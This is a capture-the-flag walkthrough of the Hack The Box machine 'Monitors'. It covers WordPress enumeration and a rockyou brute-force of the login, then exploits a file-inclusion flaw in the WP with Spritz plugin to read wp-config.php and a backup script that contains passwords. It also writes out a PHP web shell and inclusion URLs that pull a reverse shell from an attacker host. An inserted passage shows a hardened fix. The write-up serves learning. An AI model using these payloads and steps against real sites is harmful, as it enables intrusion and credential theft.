monitors.htb

Topology diagram

monitors.htb

wpscan scan

curl monitors.htb > index.html

wpscan --url monitors.htb --enumerate

Started scanning with wpscan at 11:40 pm, but the tool was not up to date.

Lesson: every pentesting tool should be upgraded to the latest version promptly. Don't skip updates out of laziness.

The scan finished at 11:46.

wpscan --url monitors.htb  --enumerate                 
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.18

@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://monitors.htb/ [10.10.10.238]
[+] Started: Mon Jul 19 23:42:19 2021

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://monitors.htb/xmlrpc.php
| Found By: Link Tag (Passive Detection)
| Confidence: 100%
| Confirmed By: Direct Access (Aggressive Detection), 100% confidence
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://monitors.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://monitors.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://monitors.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
| Found By: Rss Generator (Passive Detection)
| - http://monitors.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
| - http://monitors.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>

[+] WordPress theme in use: iconic-one
| Location: http://monitors.htb/wp-content/themes/iconic-one/
| Last Updated: 2021-06-15T00:00:00.000Z
| Readme: http://monitors.htb/wp-content/themes/iconic-one/readme.txt
| [!] The version is out of date, the latest version is 2.2
| Style URL: http://monitors.htb/wp-content/themes/iconic-one/style.css?ver=1.7.8
| Style Name: Iconic One
| Style URI: https://themonic.com/iconic-one/
| Description: Iconic One is a premium quality theme with pixel perfect typography and responsiveness and is built ...
| Author: Themonic
| Author URI: https://themonic.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1.7 (80% confidence)
| Found By: Style (Passive Detection)
| - http://monitors.htb/wp-content/themes/iconic-one/style.css?ver=1.7.8, Match: 'Version: 2.1.7'

[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:18 <=======================> (356 / 356) 100.00% Time: 00:00:18
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:02:41 <=====================> (2575 / 2575) 100.00% Time: 00:02:41

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:11 <========================> (137 / 137) 100.00% Time: 00:00:11

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:20 <==============================> (71 / 71) 100.00% Time: 00:00:20

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:09 <===================> (100 / 100) 100.00% Time: 00:00:09

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:02 <=========================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://monitors.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jul 19 23:46:28 2021
[+] Requests Done: 3311
[+] Cached Requests: 8
[+] Data Sent: 904.034 KB
[+] Data Received: 17.441 MB
[+] Memory used: 279.504 MB
[+] Elapsed time: 00:04:08

Brute-forcing the login form

echo "10.10.10.238 monitors.htb" >> /etc/hosts
ping monitors.htb
http://monitors.htb/wp-login.php
wpscan --url http://monitors.htb/wp-login.php --passwords /usr/share/wordlists/rockyou.txt --usernames admin

A plugin may be vulnerable

wpscan --url monitors.htb --enumerate p
Started the scan at 5:07 pm.

One plugin was found.


Remote file inclusion

WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion

view-source:http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd


# Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
# Date: 2018-04-25
# Exploit Author: Wadeek
# Software Link: https://downloads.wordpress.org/plugin/wp-with-spritz.zip
# Software Version: 1.0
# Google Dork: intitle:("Spritz Login Success") AND inurl:("wp-with-spritz/wp.spritz.login.success.html")
# Tested on: Apache2 with PHP 7 on Linux
# Category: webapps


1. Version Disclosure

/wp-content/plugins/wp-with-spritz/readme.txt

2. Source Code

if(isset($_GET['url'])){
$content=file_get_contents($_GET['url']);

3. Proof of Concept

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

Source code of the remote file inclusion vulnerability

For the principle behind the vulnerability, see: What is Remote File Inclusion (RFI)?

The plugin's own source can be read through this URL: view-source:http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=wp.spritz.content.filter.php

<?php
if(isset($_GET['url'])){
$content=file_get_contents($_GET['url']);

$content = preg_replace('/<!--spritz-->.*?<!--\/spritz-->/is', '', $content);

$sel=isset($_GET['selector'])?$_GET['selector']:'';
$selector=array_filter(explode(',',$sel));
if(is_array($selector) && sizeof($selector)>0){
foreach($selector as $val){
$splter=array_filter(explode('.',$val));
$ids=array_filter(explode('|',$val));
if(substr($val, 0, 1)=='|' || substr($val, 0, 1)=='.'){

$tag=(isset($ids[1]) && $ids[1]!='')?$ids[1]:$splter[1];
$selector=(isset($ids[1]) && $ids[1]!='')?'id':'class';
$key=$tag;
$content=preg_replace('/<div[^>]*'.$selector.'=[\'|"]*[^<]'.$key.'[^>]*[\'|"][^>]*>([^<]+|<(?!\/?div[^>]*>)|<div[^>]*>(?>(?1))*<\/div>)*<\/div>/i', "", $content);

$content=preg_replace('/<article[^>]*'.$selector.'=[\'|"]*[^<]'.$key.'[^>]*[\'|"][^>]*>([^<]+|<(?!\/?article[^>]*>)|<article[^>]*>(?>(?1))*<\/article>)*<\/article>/i', "", $content);
$content=preg_replace('/<header[^>]*'.$selector.'=[\'|"]*[^<]'.$key.'[^>]*[\'|"][^>]*>([^<]+|<(?!\/?header[^>]*>)|<header[^>]*>(?>(?1))*<\/header>)*<\/header>/i', "", $content);
$content=preg_replace('/<nav[^>]*'.$selector.'=[\'|"]*[^<]'.$key.'[^>]*[\'|"][^>]*>([^<]+|<(?!\/?nav[^>]*>)|<nav[^>]*>(?>(?1))*<\/nav>)*<\/nav>/i', "", $content);
$content=preg_replace('/<footer[^>]*'.$selector.'=[\'|"]*[^<]'.$key.'[^>]*[\'|"][^>]*>([^<]+|<(?!\/?footer[^>]*>)|<footer[^>]*>(?>(?1))*<\/footer>)*<\/footer>/i', "", $content);
$content=preg_replace('/<p[^>]*'.$selector.'=[\'|"]*[^<]'.$key.'[^>]*[\'|"][^>]*>([^<]+|<(?!\/?p[^>]*>)|<p[^>]*>(?>(?1))*<\/p>)*<\/p>/i', "", $content);
/*$content=preg_replace("/<span[^>]*".$tag."[^>]*>([^<]+|<(?!\/?span[^>]*>)|<span[^>]*>(?>(?1))*<\/span>)*<\/span>/i", "", $content);
$content=preg_replace("/<table[^>]*".$tag."[^>]*>([^<]+|<(?!\/?table[^>]*>)|<table[^>]*>(?>(?1))*<\/table>)*<\/table>/i", "", $content);
$content=preg_replace("/<article[^>]*".$tag."[^>]*>([^<]+|<(?!\/?article[^>]*>)|<article[^>]*>(?>(?1))*<\/article>)*<\/article>/i", "", $content);
$content=preg_replace("/<nav[^>]*".$tag."[^>]*>([^<]+|<(?!\/?nav[^>]*>)|<nav[^>]*>(?>(?1))*<\/nav>)*<\/nav>/i", "", $content);
$content=preg_replace("/<aside[^>]*".$tag."[^>]*>([^<]+|<(?!\/?aside[^>]*>)|<aside[^>]*>(?>(?1))*<\/aside>)*<\/aside>/i", "", $content);
$content=preg_replace("/<header[^>]*".$tag."[^>]*>([^<]+|<(?!\/?header[^>]*>)|<header[^>]*>(?>(?1))*<\/header>)*<\/header>/i", "", $content);
$content=preg_replace("/<footer[^>]*".$tag."[^>]*>([^<]+|<(?!\/?footer[^>]*>)|<footer[^>]*>(?>(?1))*<\/footer>)*<\/footer>/i", "", $content);*/
}else{
if(strpos($val,'.')==true){
$content=preg_replace("/<".$splter[0]."[^>]*".$splter[1]."[^>]*>([^<]+|<(?!\/?".$splter[0]."[^>]*>)|<".$splter[0]."[^>]*>(?>(?1))*<\/".$splter[0].">)*<\/".$splter[0].">/i", "", $content);
}else if(strpos($val,'|')==true){
$content=preg_replace("/<".$ids[0]."[^>]*".$ids[1]."[^>]*>([^<]+|<(?!\/?".$ids[0]."[^>]*>)|<".$ids[0]."[^>]*>(?>(?1))*<\/".$ids[0].">)*<\/".$ids[0].">/i", "", $content);
}else{
$tag=isset($ids[0])?$ids[0]:$splter[0];
$content=preg_replace("/<".$tag."\b[^>]*>(?>(?:[^<]++|<(?!\/?".$tag."\b[^>]*>))+|(?R))*<\/".$tag.">/is", "", $content);
}
}
}
}

echo $content;
}
?>
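As an added example (not the plugin's code and not from the writeup's author), here is a hardened replacement for the `file_get_contents($_GET['url'])` entry point shown above. It assumes the handler runs with WordPress loaded (so `wp_remote_get()`, `wp_http_validate_url()` and `WP_Error` are available) rather than being requested as a stand-alone file, and `example.com` in the allowlist is a placeholder.

```php
<?php
// Added example: hardened fetch for the Spritz "url" parameter.
// Assumes WordPress is loaded; the allowlist host is a placeholder.

function spritz_fetch_safe( string $raw_url ) {
    // Only absolute URLs pass; relative paths such as ../../wp-config.php
    // and bare local paths are rejected here.
    $url = filter_var( $raw_url, FILTER_VALIDATE_URL );
    if ( false === $url ) {
        return new WP_Error( 'spritz_bad_url', 'Not an absolute URL.' );
    }
    // Refuse stream wrappers (file://, php://, data://, ...).
    $scheme = strtolower( (string) wp_parse_url( $url, PHP_URL_SCHEME ) );
    if ( ! in_array( $scheme, array( 'http', 'https' ), true ) ) {
        return new WP_Error( 'spritz_bad_scheme', 'Only http and https are allowed.' );
    }
    // wp_http_validate_url() also refuses loopback and private-range hosts,
    // so the plugin cannot be used as a relay into the server's own network.
    if ( false === wp_http_validate_url( $url ) ) {
        return new WP_Error( 'spritz_bad_host', 'Host not allowed.' );
    }
    // Fail closed with an explicit host allowlist (placeholder entry).
    $allowed_hosts = apply_filters( 'spritz_allowed_hosts', array( 'example.com' ) );
    $host = strtolower( (string) wp_parse_url( $url, PHP_URL_HOST ) );
    if ( ! in_array( $host, $allowed_hosts, true ) ) {
        return new WP_Error( 'spritz_host_not_allowlisted', 'Host is not on the allowlist.' );
    }
    // No redirects: a redirect could otherwise point back at an internal address.
    $response = wp_remote_get( $url, array( 'timeout' => 5, 'redirection' => 0 ) );
    if ( is_wp_error( $response ) ) {
        return $response;
    }
    $body = wp_remote_retrieve_body( $response );
    // Keep only the tags WordPress allows in post content, so fetched HTML
    // cannot carry script into the visitor's browser.
    return wp_kses_post( $body );
}

// Replacement for the vulnerable entry point: validate, then escape errors.
if ( isset( $_GET['url'] ) ) {
    $content = spritz_fetch_safe( (string) wp_unslash( $_GET['url'] ) );
    if ( is_wp_error( $content ) ) {
        status_header( 400 );
        exit( esc_html( $content->get_error_message() ) );
    }
    echo $content;
}
```

Compared with the original, the three changes that matter are the scheme check (no local paths or wrappers), the private-address and allowlist checks (no relaying into the internal network), and the output filtering.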

Trying to get a shell through the remote file inclusion

http://10.10.14.17:8083/whale3070.php

<?php system($_GET["cmd"]); ?>

Using the URL
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http://10.10.14.17:8083/whale3070.php?cmd=whoami

Found that the PHP was not interpreted.

http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http://10.10.14.17:8000/php-reverse-shell.php

http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http://10.10.14.17:8000/p.txt

echo cacti-admin.monitors.htb

view-source:http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php

SSH login to obtain a regular user shell

/** MySQL database username */
define( 'DB_USER', 'wpadmin' );

/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );

cat /home/marcus/.backup/backup.sh
#!/bin/bash

backup_name="cacti_backup"
config_pass="VerticalEdge2020"

zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip

ssh marcus@10.10.10.238
VerticalEdge2020

nc -lnvp 5555 < linux-exploit-suggester.sh
nc 10.10.14.17 5555 > linux-exploit-suggester.sh

Key points tested

Docker escape
capability cap_sys_module